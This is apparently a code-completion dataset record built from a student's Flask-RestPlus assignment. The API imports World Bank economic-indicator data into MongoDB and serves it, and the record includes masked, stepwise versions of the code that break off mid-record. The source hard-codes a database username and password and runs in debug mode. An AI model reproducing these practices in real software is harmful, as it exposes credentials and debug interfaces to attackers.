created_collection = db[COLLECTION].insert_one(collection)
return {'location':
f'/{COLLECTION}/{str(created_collection.inserted_id)}',
'collection_id': str(created_collection.inserted_id),
'creation_time': str(collection['creation_time']), 'indicator':
collection['indicator']}, 201
@api.doc(description='[Q3] Retrieve the list of available collections.')
@api.response(200, 'Successfully retreieved collections.')
@api.response(400, 'Unable to retreive collections.')
def get(self):
try:
collections = db[COLLECTION].find()
except:
return {'message': 'Unable to retrieve collections.'}, 400
return [{'location': f"/{COLLECTION}/{str(doc['_id'])}",
'collection_id': str(doc['_id']), 'creation_time': str(doc[
'creation_time']), 'indicator': doc['indicator']} for doc in
collections], 200
@api.route(f'/{COLLECTION}/<collection_id>', endpoint=f'{COLLECTION}_by_id')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
class CollectionsById(Resource):
@api.doc(description='[Q2] Deleting a collection with the data service.')
@api.response(200, 'Successfully removed collection.')
@api.response(404, 'Unable to find collection.')
@api.response(400, 'Unable to remove collection.')
def delete(self, collection_id):
if not db[COLLECTION].find_one({'_id': ObjectId(collection_id)}):
return {'message': 'Unable to find collection.'}, 404
try:
db[COLLECTION].delete_one({'_id': ObjectId(collection_id)})
except:
return {'message': 'Unable to remove collection.'}, 400
return {'message':
f'Collection = {collection_id} has been removed from the database!'
}, 200
@api.doc(description='[Q4] Retrieve a collection.')
@api.response(200, 'Successfully retreived collection.')
@api.response(404, 'Unable to retreive collection.')
def get(self, collection_id):
try:
collection = db[COLLECTION].find_one({'_id': ObjectId(
collection_id)})
except:
return {'message': 'Unable to find collection'}, 404
return {'collection_id': str(collection['_id']), 'indicator':
collection['indicator'], 'indicator_value': collection[
'indicator_value'], 'creation_time': str(collection[
'creation_time']), 'entries': collection['entries']}, 200
@api.route(f'/{COLLECTION}/<collection_id>/<year>/<country>', endpoint=
f'{COLLECTION}_countrydate')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
@api.param('year', 'Year ranging from 2012 to 2017.')
@api.param('country', 'Country identifier (eg. Arab World)')
class CollectionByCountryYear(Resource):
@api.doc(description=
'[Q5] Retrieve economic indicator value for given a country and year.')
@api.response(200,
'Successfully retrieved economic indicator for given a country and year.'
)
@api.response(400, 'Unable to retrieve indicator entry.')
@api.response(404, 'Unable to find collection.')
def get(self, collection_id, year, country):
try:
collection = db[COLLECTION].find_one({'_id': ObjectId(
collection_id)})
except:
return {'message': 'Unable to find collection'}, 404
filtered_entries = [entry for entry in collection['entries'] if
entry['country'] == country and entry['date'] == year]
if len(filtered_entries) == 0:
return {'message':
f"Unable to find specific indicator entry for country='{country}' and year='{year}'."
}, 400
return {'collection_id': str(collection['_id']), 'indicator':
collection['indicator'], **filtered_entries[0]}, 200
@api.route(f'/{COLLECTION}/<collection_id>/<year>', endpoint=
f'{COLLECTION}_by_top_bottom')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
@api.param('year', 'Year ranging from 2012 to 2017.')
class CollectionByTopBottom(Resource):
@api.doc(description=
'[Q6] Retrieve top/bottom economic indicator values for a given year.')
@api.response(200, 'Successfully retreived economic indicator values.')
@api.response(404, 'Unable to find collection.')
@api.expect(parser)
def get(self, collection_id, year):
query = request.args.get('q')
try:
collection = db[COLLECTION].find_one({'_id': ObjectId(
collection_id)})
except:
return {'message': 'Unable to find collection'}, 404
filtered_entries = [entry for entry in collection['entries'] if
entry['date'] == year]
if not query:
return {'indicator': collection['indicator'], 'indicator_value':
collection['indicator_value'], 'entries': filtered_entries
}, 200
return {'indicator': collection['indicator'], 'indicator_value':
collection['indicator_value'], 'entries': sorted(
filtered_entries, key=lambda k: k['value'], reverse=True)[
query_to_index(query, len(filtered_entries))]}, 200
if __name__ == '__main__':
db = mlab_client(dbuser=DB_CONFIG['dbuser'], dbpassword=DB_CONFIG[
'dbpassword'], mlab_inst=DB_CONFIG['mlab_inst'], dbname=DB_CONFIG[
'dbname'])
app.run(debug=DEBUG)
<|reserved_special_token_1|>
#!/usr/bin/env python3
from flask import Flask, request
from flask_restplus import Resource, Api, fields
from pymongo import MongoClient
from bson.objectid import ObjectId
import requests, datetime, re
#------------- CONFIG CONSTANTS -------------#
DEBUG = True
MAX_PAGE_LIMIT = 2
COLLECTION = 'indicators'
DB_CONFIG = {
'dbuser': 'z5113243',
'dbpassword': 'badpassword01',
'mlab_inst': 'ds239071',
'dbname': 'cs9321_ass2'
}
#------------- API INITIALISATION -------------#
db = None # initialised in main
app = Flask(__name__)
app.config.SWAGGER_UI_DOC_EXPANSION = 'list'
api = Api(
app,
title='Assignment 2 - COMP9321 - Chris Joy (z5113243)',
description='In this assignment, we\'re asked to develop ' \
'a Flask-Restplus data service that allows a client to ' \
'read and store some publicly available economic indicator ' \
'data for countries around the world, and allow the consumers ' \
'to access the data through a REST API.'
)
indicator_model = api.model(COLLECTION, {
'indicator_id': fields.String(required=True,
title='An Indicator ',
description='http://api.worldbank.org/v2/indicators',
example='NY.GDP.MKTP.CD'),
})
parser = api.parser()
parser.add_argument('q', help='Query param. Expected format: top<k> / bottom<k>, ' \
'where k is between 1 and 100. Eg. top10, bottom40')
#------------- HELPER FUNCTIONS -------------#
def mlab_client(dbuser, dbpassword, mlab_inst, dbname):
return MongoClient(
f'mongodb://{dbuser}:{dbpassword}@{mlab_inst}.mlab.com:39071/{dbname}'
)[dbname]
def api_url(indicator, date='2012:2017', fmt='json', page=1):
return 'http://api.worldbank.org/v2/countries/all/indicators/' \
f'{indicator}?date={date}&format={fmt}&page={page}'
# Recursively build an array containing indicator data
def get_indicator_data(indicator, page=1, prevRes=[], max_pages=MAX_PAGE_LIMIT):
response = requests.get(api_url(indicator=indicator, page=page)).json()
if not indicator or (len(response) <= 1 and response[0]['message'][0]['key'] == 'Invalid value'):
return 'Invalid indicator'
if response[0]['page'] >= max_pages or response[0]['page'] == response[0]['pages']:
return prevRes+response[1]
return get_indicator_data(
indicator=indicator,
page=response[0]['page']+1,
prevRes=prevRes+response[1],
max_pages=max_pages,
)
# Restructure indicator entry according to spec
def format_collection_entry(indicator_data):
return {
'country': indicator_data['country']['value'],
'date': indicator_data['date'],
'value': indicator_data['value'],
}
# Transform to top<k>/bottom<k> queries to array indexes
def query_to_index(query, arr_size):
try:
match = re.search(r'^(bottom|top)\d+$', query).group()
order = re.search(r'^(bottom|top)', match).group()
length = int(re.search(r'\d+$', match).group())
if order == 'top':
return slice(length)
elif order == 'bottom':
return slice(arr_size-length, arr_size)
else:
return slice(arr_size)
except:
return slice(arr_size)
#------------- QUESTION ROUTES -------------#
@api.route(f'/{COLLECTION}', endpoint=COLLECTION)
class CollectionIndex(Resource):
@api.doc(description='[Q1] Import a collection from the data service.')
@api.response(200, 'Successfully retrieved collection.')
@api.response(201, 'Successfully created collection.')
@api.response(400, 'Unable to create / retrieve collection.')
@api.expect(indicator_model)
def post(self):
body = request.json
# Indicator hasn't been specified in body (400)
if not body['indicator_id']:
return { 'message': 'Please specify an indicator.' }, 400
# Retrieve indicator from database (200)
existing_collection = db[COLLECTION].find_one({'indicator': body['indicator_id']})
if existing_collection:
return {
'location': f'/{COLLECTION}/{str(existing_collection["_id"])}',
'collection_id': str(existing_collection['_id']),
'creation_time': str(existing_collection['creation_time']),
'indicator': existing_collection['indicator'],
}, 200
# From now onwards we need to obtain data from the Worldbank API
indicator_data = get_indicator_data(body['indicator_id'])
# Valid indicator hasn't been specified (400)
if indicator_data == 'Invalid indicator':
return { 'message': 'Please specify a valid indicator.' }, 400
# Create and retrieve indicator from Worldbank API (201)
collection = {
'indicator': indicator_data[0]['indicator']['id'],
'indicator_value': indicator_data[0]['indicator']['value'],
'creation_time': datetime.datetime.utcnow(),
'entries': [format_collection_entry(entry) for entry in indicator_data],
}
created_collection = db[COLLECTION].insert_one(collection)
return {
'location': f'/{COLLECTION}/{str(created_collection.inserted_id)}',
'collection_id': str(created_collection.inserted_id),
'creation_time': str(collection['creation_time']),
'indicator': collection['indicator'],
}, 201
@api.doc(description='[Q3] Retrieve the list of available collections.')
@api.response(200, 'Successfully retreieved collections.')
@api.response(400, 'Unable to retreive collections.')
def get(self):
try:
collections = db[COLLECTION].find()
except:
return { 'message': 'Unable to retrieve collections.' }, 400
return [{
'location': f'/{COLLECTION}/{str(doc["_id"])}',
'collection_id': str(doc['_id']),
'creation_time': str(doc['creation_time']),
'indicator': doc['indicator'],
} for doc in collections], 200
@api.route(f'/{COLLECTION}/<collection_id>', endpoint=f'{COLLECTION}_by_id')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
class CollectionsById(Resource):
@api.doc(description='[Q2] Deleting a collection with the data service.')
@api.response(200, 'Successfully removed collection.')
@api.response(404, 'Unable to find collection.')
@api.response(400, 'Unable to remove collection.')
def delete(self, collection_id):
# Check if collection exists
if not db[COLLECTION].find_one({'_id': ObjectId(collection_id)}):
return { 'message': 'Unable to find collection.' }, 404
# Remove collection from db
try:
db[COLLECTION].delete_one({'_id': ObjectId(collection_id)})
except:
return { 'message': 'Unable to remove collection.' }, 400
return { 'message': f'Collection = {collection_id} has been removed from the database!' }, 200
@api.doc(description='[Q4] Retrieve a collection.')
@api.response(200, 'Successfully retreived collection.')
@api.response(404, 'Unable to retreive collection.')
def get(self, collection_id):
try:
collection = db[COLLECTION].find_one({'_id': ObjectId(collection_id)})
except:
return { 'message': 'Unable to find collection' }, 404
return {
'collection_id': str(collection['_id']),
'indicator': collection['indicator'],
'indicator_value': collection['indicator_value'],
'creation_time': str(collection['creation_time']),
'entries': collection['entries'],
}, 200
@api.route(f'/{COLLECTION}/<collection_id>/<year>/<country>', endpoint=f'{COLLECTION}_countrydate')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
@api.param('year', 'Year ranging from 2012 to 2017.')
@api.param('country', 'Country identifier (eg. Arab World)')
class CollectionByCountryYear(Resource):
@api.doc(description='[Q5] Retrieve economic indicator value for given a country and year.')
@api.response(200, 'Successfully retrieved economic indicator for given a country and year.')
@api.response(400, 'Unable to retrieve indicator entry.')
@api.response(404, 'Unable to find collection.')
def get(self, collection_id, year, country):
try:
collection = db[COLLECTION].find_one({'_id': ObjectId(collection_id)})
except:
return { 'message': 'Unable to find collection' }, 404
# Create a filtered list containing entries that match params
filtered_entries = [
entry for entry in collection['entries'] if entry['country'] == country and entry['date'] == year
]
if len(filtered_entries) == 0:
return {'message': 'Unable to find specific indicator entry ' \
f'for country=\'{country}\' and year=\'{year}\'.'}, 400
return {
'collection_id': str(collection['_id']),
'indicator': collection['indicator'],
**filtered_entries[0],
}, 200
@api.route(f'/{COLLECTION}/<collection_id>/<year>', endpoint=f'{COLLECTION}_by_top_bottom')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
@api.param('year', 'Year ranging from 2012 to 2017.')
class CollectionByTopBottom(Resource):
@api.doc(description='[Q6] Retrieve top/bottom economic indicator values for a given year.')
@api.response(200, 'Successfully retreived economic indicator values.')
@api.response(404, 'Unable to find collection.')
@api.expect(parser)
def get(self, collection_id, year):
query = request.args.get('q')
try:
collection = db[COLLECTION].find_one({'_id': ObjectId(collection_id)})
except:
return { 'message': 'Unable to find collection' }, 404
filtered_entries = [
entry for entry in collection['entries'] if entry['date'] == year
]
if not query:
return {
'indicator': collection['indicator'],
'indicator_value': collection['indicator_value'],
'entries': filtered_entries,
}, 200
return {
'indicator': collection['indicator'],
'indicator_value': collection['indicator_value'],
'entries': sorted(
filtered_entries,
key=lambda k: k['value'],
reverse=True
)[query_to_index(query, len(filtered_entries))],
}, 200
if __name__ == '__main__':
db = mlab_client(
dbuser=DB_CONFIG['dbuser'],
dbpassword=DB_CONFIG['dbpassword'],
mlab_inst=DB_CONFIG['mlab_inst'],
dbname=DB_CONFIG['dbname']
)
app.run(debug=DEBUG)
|
flexible
|
{
"blob_id": "75958b48a3372b56e072a0caa468171ab6b99eb6",
"index": 8917,
"step-1": "<mask token>\n\n\[email protected](f'/{COLLECTION}/<collection_id>', endpoint=f'{COLLECTION}_by_id')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\nclass CollectionsById(Resource):\n\n @api.doc(description='[Q2] Deleting a collection with the data service.')\n @api.response(200, 'Successfully removed collection.')\n @api.response(404, 'Unable to find collection.')\n @api.response(400, 'Unable to remove collection.')\n def delete(self, collection_id):\n if not db[COLLECTION].find_one({'_id': ObjectId(collection_id)}):\n return {'message': 'Unable to find collection.'}, 404\n try:\n db[COLLECTION].delete_one({'_id': ObjectId(collection_id)})\n except:\n return {'message': 'Unable to remove collection.'}, 400\n return {'message':\n f'Collection = {collection_id} has been removed from the database!'\n }, 200\n\n @api.doc(description='[Q4] Retrieve a collection.')\n @api.response(200, 'Successfully retreived collection.')\n @api.response(404, 'Unable to retreive collection.')\n def get(self, collection_id):\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(\n collection_id)})\n except:\n return {'message': 'Unable to find collection'}, 404\n return {'collection_id': str(collection['_id']), 'indicator':\n collection['indicator'], 'indicator_value': collection[\n 'indicator_value'], 'creation_time': str(collection[\n 'creation_time']), 'entries': collection['entries']}, 200\n\n\[email protected](f'/{COLLECTION}/<collection_id>/<year>/<country>', endpoint=\n f'{COLLECTION}_countrydate')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\[email protected]('year', 'Year ranging from 2012 to 2017.')\[email protected]('country', 'Country identifier (eg. Arab World)')\nclass CollectionByCountryYear(Resource):\n\n @api.doc(description=\n '[Q5] Retrieve economic indicator value for given a country and year.')\n @api.response(200,\n 'Successfully retrieved economic indicator for given a country and year.'\n )\n @api.response(400, 'Unable to retrieve indicator entry.')\n @api.response(404, 'Unable to find collection.')\n def get(self, collection_id, year, country):\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(\n collection_id)})\n except:\n return {'message': 'Unable to find collection'}, 404\n filtered_entries = [entry for entry in collection['entries'] if \n entry['country'] == country and entry['date'] == year]\n if len(filtered_entries) == 0:\n return {'message':\n f\"Unable to find specific indicator entry for country='{country}' and year='{year}'.\"\n }, 400\n return {'collection_id': str(collection['_id']), 'indicator':\n collection['indicator'], **filtered_entries[0]}, 200\n\n\[email protected](f'/{COLLECTION}/<collection_id>/<year>', endpoint=\n f'{COLLECTION}_by_top_bottom')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\[email protected]('year', 'Year ranging from 2012 to 2017.')\nclass CollectionByTopBottom(Resource):\n\n @api.doc(description=\n '[Q6] Retrieve top/bottom economic indicator values for a given year.')\n @api.response(200, 'Successfully retreived economic indicator values.')\n @api.response(404, 'Unable to find collection.')\n @api.expect(parser)\n def get(self, collection_id, year):\n query = request.args.get('q')\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(\n collection_id)})\n except:\n return {'message': 'Unable to find collection'}, 404\n filtered_entries = [entry for entry in collection['entries'] if \n entry['date'] == year]\n if not query:\n return {'indicator': collection['indicator'], 'indicator_value':\n collection['indicator_value'], 'entries': filtered_entries\n }, 200\n return {'indicator': collection['indicator'], 'indicator_value':\n collection['indicator_value'], 'entries': sorted(\n filtered_entries, key=lambda k: k['value'], reverse=True)[\n query_to_index(query, len(filtered_entries))]}, 200\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_indicator_data(indicator, page=1, prevRes=[], max_pages=MAX_PAGE_LIMIT\n ):\n response = requests.get(api_url(indicator=indicator, page=page)).json()\n if not indicator or len(response) <= 1 and response[0]['message'][0]['key'\n ] == 'Invalid value':\n return 'Invalid indicator'\n if response[0]['page'] >= max_pages or response[0]['page'] == response[0][\n 'pages']:\n return prevRes + response[1]\n return get_indicator_data(indicator=indicator, page=response[0]['page'] +\n 1, prevRes=prevRes + response[1], max_pages=max_pages)\n\n\n<mask token>\n\n\[email protected](f'/{COLLECTION}', endpoint=COLLECTION)\nclass CollectionIndex(Resource):\n\n @api.doc(description='[Q1] Import a collection from the data service.')\n @api.response(200, 'Successfully retrieved collection.')\n @api.response(201, 'Successfully created collection.')\n @api.response(400, 'Unable to create / retrieve collection.')\n @api.expect(indicator_model)\n def post(self):\n body = request.json\n if not body['indicator_id']:\n return {'message': 'Please specify an indicator.'}, 400\n existing_collection = db[COLLECTION].find_one({'indicator': body[\n 'indicator_id']})\n if existing_collection:\n return {'location':\n f\"/{COLLECTION}/{str(existing_collection['_id'])}\",\n 'collection_id': str(existing_collection['_id']),\n 'creation_time': str(existing_collection['creation_time']),\n 'indicator': existing_collection['indicator']}, 200\n indicator_data = get_indicator_data(body['indicator_id'])\n if indicator_data == 'Invalid indicator':\n return {'message': 'Please specify a valid indicator.'}, 400\n collection = {'indicator': indicator_data[0]['indicator']['id'],\n 'indicator_value': indicator_data[0]['indicator']['value'],\n 'creation_time': datetime.datetime.utcnow(), 'entries': [\n format_collection_entry(entry) for entry in indicator_data]}\n created_collection = db[COLLECTION].insert_one(collection)\n return {'location':\n f'/{COLLECTION}/{str(created_collection.inserted_id)}',\n 'collection_id': str(created_collection.inserted_id),\n 'creation_time': str(collection['creation_time']), 'indicator':\n collection['indicator']}, 201\n\n @api.doc(description='[Q3] Retrieve the list of available collections.')\n @api.response(200, 'Successfully retreieved collections.')\n @api.response(400, 'Unable to retreive collections.')\n def get(self):\n try:\n collections = db[COLLECTION].find()\n except:\n return {'message': 'Unable to retrieve collections.'}, 400\n return [{'location': f\"/{COLLECTION}/{str(doc['_id'])}\",\n 'collection_id': str(doc['_id']), 'creation_time': str(doc[\n 'creation_time']), 'indicator': doc['indicator']} for doc in\n collections], 200\n\n\[email protected](f'/{COLLECTION}/<collection_id>', endpoint=f'{COLLECTION}_by_id')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\nclass CollectionsById(Resource):\n\n @api.doc(description='[Q2] Deleting a collection with the data service.')\n @api.response(200, 'Successfully removed collection.')\n @api.response(404, 'Unable to find collection.')\n @api.response(400, 'Unable to remove collection.')\n def delete(self, collection_id):\n if not db[COLLECTION].find_one({'_id': ObjectId(collection_id)}):\n return {'message': 'Unable to find collection.'}, 404\n try:\n db[COLLECTION].delete_one({'_id': ObjectId(collection_id)})\n except:\n return {'message': 'Unable to remove collection.'}, 400\n return {'message':\n f'Collection = {collection_id} has been removed from the database!'\n }, 200\n\n @api.doc(description='[Q4] Retrieve a collection.')\n @api.response(200, 'Successfully retreived collection.')\n @api.response(404, 'Unable to retreive collection.')\n def get(self, collection_id):\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(\n collection_id)})\n except:\n return {'message': 'Unable to find collection'}, 404\n return {'collection_id': str(collection['_id']), 'indicator':\n collection['indicator'], 'indicator_value': collection[\n 'indicator_value'], 'creation_time': str(collection[\n 'creation_time']), 'entries': collection['entries']}, 200\n\n\[email protected](f'/{COLLECTION}/<collection_id>/<year>/<country>', endpoint=\n f'{COLLECTION}_countrydate')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\[email protected]('year', 'Year ranging from 2012 to 2017.')\[email protected]('country', 'Country identifier (eg. Arab World)')\nclass CollectionByCountryYear(Resource):\n\n @api.doc(description=\n '[Q5] Retrieve economic indicator value for given a country and year.')\n @api.response(200,\n 'Successfully retrieved economic indicator for given a country and year.'\n )\n @api.response(400, 'Unable to retrieve indicator entry.')\n @api.response(404, 'Unable to find collection.')\n def get(self, collection_id, year, country):\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(\n collection_id)})\n except:\n return {'message': 'Unable to find collection'}, 404\n filtered_entries = [entry for entry in collection['entries'] if \n entry['country'] == country and entry['date'] == year]\n if len(filtered_entries) == 0:\n return {'message':\n f\"Unable to find specific indicator entry for country='{country}' and year='{year}'.\"\n }, 400\n return {'collection_id': str(collection['_id']), 'indicator':\n collection['indicator'], **filtered_entries[0]}, 200\n\n\[email protected](f'/{COLLECTION}/<collection_id>/<year>', endpoint=\n f'{COLLECTION}_by_top_bottom')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\[email protected]('year', 'Year ranging from 2012 to 2017.')\nclass CollectionByTopBottom(Resource):\n\n @api.doc(description=\n '[Q6] Retrieve top/bottom economic indicator values for a given year.')\n @api.response(200, 'Successfully retreived economic indicator values.')\n @api.response(404, 'Unable to find collection.')\n @api.expect(parser)\n def get(self, collection_id, year):\n query = request.args.get('q')\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(\n collection_id)})\n except:\n return {'message': 'Unable to find collection'}, 404\n filtered_entries = [entry for entry in collection['entries'] if \n entry['date'] == year]\n if not query:\n return {'indicator': collection['indicator'], 'indicator_value':\n collection['indicator_value'], 'entries': filtered_entries\n }, 200\n return {'indicator': collection['indicator'], 'indicator_value':\n collection['indicator_value'], 'entries': sorted(\n filtered_entries, key=lambda k: k['value'], reverse=True)[\n query_to_index(query, len(filtered_entries))]}, 200\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef mlab_client(dbuser, dbpassword, mlab_inst, dbname):\n return MongoClient(\n f'mongodb://{dbuser}:{dbpassword}@{mlab_inst}.mlab.com:39071/{dbname}'\n )[dbname]\n\n\ndef api_url(indicator, date='2012:2017', fmt='json', page=1):\n return (\n f'http://api.worldbank.org/v2/countries/all/indicators/{indicator}?date={date}&format={fmt}&page={page}'\n )\n\n\ndef get_indicator_data(indicator, page=1, prevRes=[], max_pages=MAX_PAGE_LIMIT\n ):\n response = requests.get(api_url(indicator=indicator, page=page)).json()\n if not indicator or len(response) <= 1 and response[0]['message'][0]['key'\n ] == 'Invalid value':\n return 'Invalid indicator'\n if response[0]['page'] >= max_pages or response[0]['page'] == response[0][\n 'pages']:\n return prevRes + response[1]\n return get_indicator_data(indicator=indicator, page=response[0]['page'] +\n 1, prevRes=prevRes + response[1], max_pages=max_pages)\n\n\ndef format_collection_entry(indicator_data):\n return {'country': indicator_data['country']['value'], 'date':\n indicator_data['date'], 'value': indicator_data['value']}\n\n\ndef query_to_index(query, arr_size):\n try:\n match = re.search('^(bottom|top)\\\\d+$', query).group()\n order = re.search('^(bottom|top)', match).group()\n length = int(re.search('\\\\d+$', match).group())\n if order == 'top':\n return slice(length)\n elif order == 'bottom':\n return slice(arr_size - length, arr_size)\n else:\n return slice(arr_size)\n except:\n return slice(arr_size)\n\n\[email protected](f'/{COLLECTION}', endpoint=COLLECTION)\nclass CollectionIndex(Resource):\n\n @api.doc(description='[Q1] Import a collection from the data service.')\n @api.response(200, 'Successfully retrieved collection.')\n @api.response(201, 'Successfully created collection.')\n @api.response(400, 'Unable to create / retrieve collection.')\n @api.expect(indicator_model)\n def post(self):\n body = request.json\n if not body['indicator_id']:\n return {'message': 'Please specify an indicator.'}, 400\n existing_collection = db[COLLECTION].find_one({'indicator': body[\n 'indicator_id']})\n if existing_collection:\n return {'location':\n f\"/{COLLECTION}/{str(existing_collection['_id'])}\",\n 'collection_id': str(existing_collection['_id']),\n 'creation_time': str(existing_collection['creation_time']),\n 'indicator': existing_collection['indicator']}, 200\n indicator_data = get_indicator_data(body['indicator_id'])\n if indicator_data == 'Invalid indicator':\n return {'message': 'Please specify a valid indicator.'}, 400\n collection = {'indicator': indicator_data[0]['indicator']['id'],\n 'indicator_value': indicator_data[0]['indicator']['value'],\n 'creation_time': datetime.datetime.utcnow(), 'entries': [\n format_collection_entry(entry) for entry in indicator_data]}\n created_collection = db[COLLECTION].insert_one(collection)\n return {'location':\n f'/{COLLECTION}/{str(created_collection.inserted_id)}',\n 'collection_id': str(created_collection.inserted_id),\n 'creation_time': str(collection['creation_time']), 'indicator':\n collection['indicator']}, 201\n\n @api.doc(description='[Q3] Retrieve the list of available collections.')\n @api.response(200, 'Successfully retreieved collections.')\n @api.response(400, 'Unable to retreive collections.')\n def get(self):\n try:\n collections = db[COLLECTION].find()\n except:\n return {'message': 'Unable to retrieve collections.'}, 400\n return [{'location': f\"/{COLLECTION}/{str(doc['_id'])}\",\n 'collection_id': str(doc['_id']), 'creation_time': str(doc[\n 'creation_time']), 'indicator': doc['indicator']} for doc in\n collections], 200\n\n\[email protected](f'/{COLLECTION}/<collection_id>', endpoint=f'{COLLECTION}_by_id')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\nclass CollectionsById(Resource):\n\n @api.doc(description='[Q2] Deleting a collection with the data service.')\n @api.response(200, 'Successfully removed collection.')\n @api.response(404, 'Unable to find collection.')\n @api.response(400, 'Unable to remove collection.')\n def delete(self, collection_id):\n if not db[COLLECTION].find_one({'_id': ObjectId(collection_id)}):\n return {'message': 'Unable to find collection.'}, 404\n try:\n db[COLLECTION].delete_one({'_id': ObjectId(collection_id)})\n except:\n return {'message': 'Unable to remove collection.'}, 400\n return {'message':\n f'Collection = {collection_id} has been removed from the database!'\n }, 200\n\n @api.doc(description='[Q4] Retrieve a collection.')\n @api.response(200, 'Successfully retreived collection.')\n @api.response(404, 'Unable to retreive collection.')\n def get(self, collection_id):\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(\n collection_id)})\n except:\n return {'message': 'Unable to find collection'}, 404\n return {'collection_id': str(collection['_id']), 'indicator':\n collection['indicator'], 'indicator_value': collection[\n 'indicator_value'], 'creation_time': str(collection[\n 'creation_time']), 'entries': collection['entries']}, 200\n\n\[email protected](f'/{COLLECTION}/<collection_id>/<year>/<country>', endpoint=\n f'{COLLECTION}_countrydate')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\[email protected]('year', 'Year ranging from 2012 to 2017.')\[email protected]('country', 'Country identifier (eg. Arab World)')\nclass CollectionByCountryYear(Resource):\n\n @api.doc(description=\n '[Q5] Retrieve economic indicator value for given a country and year.')\n @api.response(200,\n 'Successfully retrieved economic indicator for given a country and year.'\n )\n @api.response(400, 'Unable to retrieve indicator entry.')\n @api.response(404, 'Unable to find collection.')\n def get(self, collection_id, year, country):\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(\n collection_id)})\n except:\n return {'message': 'Unable to find collection'}, 404\n filtered_entries = [entry for entry in collection['entries'] if \n entry['country'] == country and entry['date'] == year]\n if len(filtered_entries) == 0:\n return {'message':\n f\"Unable to find specific indicator entry for country='{country}' and year='{year}'.\"\n }, 400\n return {'collection_id': str(collection['_id']), 'indicator':\n collection['indicator'], **filtered_entries[0]}, 200\n\n\[email protected](f'/{COLLECTION}/<collection_id>/<year>', endpoint=\n f'{COLLECTION}_by_top_bottom')\[email protected]('collection_id', f'Unique id, used to distinguish {COLLECTION}.')\[email protected]('year', 'Year ranging from 2012 to 2017.')\nclass CollectionByTopBottom(Resource):\n\n @api.doc(description=\n '[Q6] Retrieve top/bottom economic indicator values for a given year.')\n @api.response(200, 'Successfully retreived economic indicator values.')\n @api.response(404, 'Unable to find collection.')\n @api.expect(parser)\n def get(self, collection_id, year):\n query = request.args.get('q')\n try:\n collection = db[COLLECTION].find_one({'_id': ObjectId(\n collection_id)})\n except:\n return {'message': 'Unable to find collection'}, 404\n filtered_entries = [entry for entry in collection['entries'] if \n entry['date'] == year]\n if not query:\n return {'indicator': collection['indicator'], 'indicator_value':\n collection['indicator_value'], 'entries': filtered_entries\n }, 200\n return {'indicator': collection['indicator'], 'indicator_value':\n collection['indicator_value'], 'entries': sorted(\n filtered_entries, key=lambda k: k['value'], reverse=True)[\n query_to_index(query, len(filtered_entries))]}, 200\n\n\n<mask token>\n",
"step-4": "<mask token>\nparser.add_argument('q', help=\n 'Query param. Expected format: top<k> / bottom<k>, where k is between 1 and 100. Eg. top10, bottom40'\n )\n\n\ndef mlab_client(dbuser, dbpassword, mlab_inst, dbname):\n return MongoClient(\n f'mongodb://{dbuser}:{dbpassword}@{mlab_inst}.mlab.com:39071/{dbname}'\n )[dbname]\n\n\ndef api_url(indicator, date='2012:2017', fmt='json', page=1):\n return (\n f'http://api.worldbank.org/v2/countries/all/indicators/{indicator}?date={date}&format={fmt}&page={page}'\n )\n\n\ndef get_indicator_data(indicator, page=1, prevRes=[], max_pages=MAX_PAGE_LIMIT\n ):\n response = requests.get(api_url(indicator=indicator, page=page)).json()\n if not indicator or len(response) <= 1 and response[0]['message'][0]['key'\n ] == 'Invalid value':\n return 'Invalid indicator'\n if response[0]['page'] >= max_pages or response[0]['page'] == response[0][\n 'pages']:\n return prevRes + response[1]\n return get_indicator_data(indicator=indicator, page=response[0]['page'] +\n 1, prevRes=prevRes + response[1], max_pages=max_pages)\n\n\ndef format_collection_entry(indicator_data):\n return {'country': indicator_data['country']['value'], 'date':\n indicator_data['date'], 'value': indicator_data['value']}\n\n\ndef query_to_index(query, arr_size):\n try:\n match = re.search('^(bottom|top)\\\\d+$', query).group()\n order = re.search('^(bottom|top)', match).group()\n length = int(re.search('\\\\d+$', match).group())\n if order == 'top':\n return slice(length)\n elif order == 'bottom':\n return slice(arr_size - length, arr_size)\n else:\n return slice(arr_size)\n except:\n return slice(arr_size)\n\n\[email protected](f'/{COLLECTION}', endpoint=COLLECTION)\nclass CollectionIndex(Resource):\n\n @api.doc(description='[Q1] Import a collection from the data service.')\n @api.response(200, 'Successfully retrieved collection.')\n @api.response(201, 'Successfully created collection.')\n @api.response(400, 'Unable to create / retrieve collection.')\n @api.expect(indicator_model)\n def post(self):\n body = request.json\n if not body['indicator_id']:\n return {'message': 'Please specify an indicator.'}, 400\n existing_collection = db[COLLECTION].find_one({'indicator': body[\n 'indicator_id']})\n if existing_collection:\n return {'location':\n f\"/{COLLECTION}/{str(existing_collection['_id'])}\",\n 'collection_id': str(existing_collection['_id']),\n 'creation_time': str(existing_collection['creation_time']),\n 'indicator': existing_collection['indicator']}, 200\n indicator_data = get_indicator_data(body['indicator_id'])\n if indicator_data == 'Invalid indicator':\n return {'message': 'Please specify a valid indicator.'}, 400\n collection = {'indicator': indicator_data[0]['indicator']['id'],\n 'indicator_value': indicator_data[0]['indicator']['value'],\n 'creation_time': 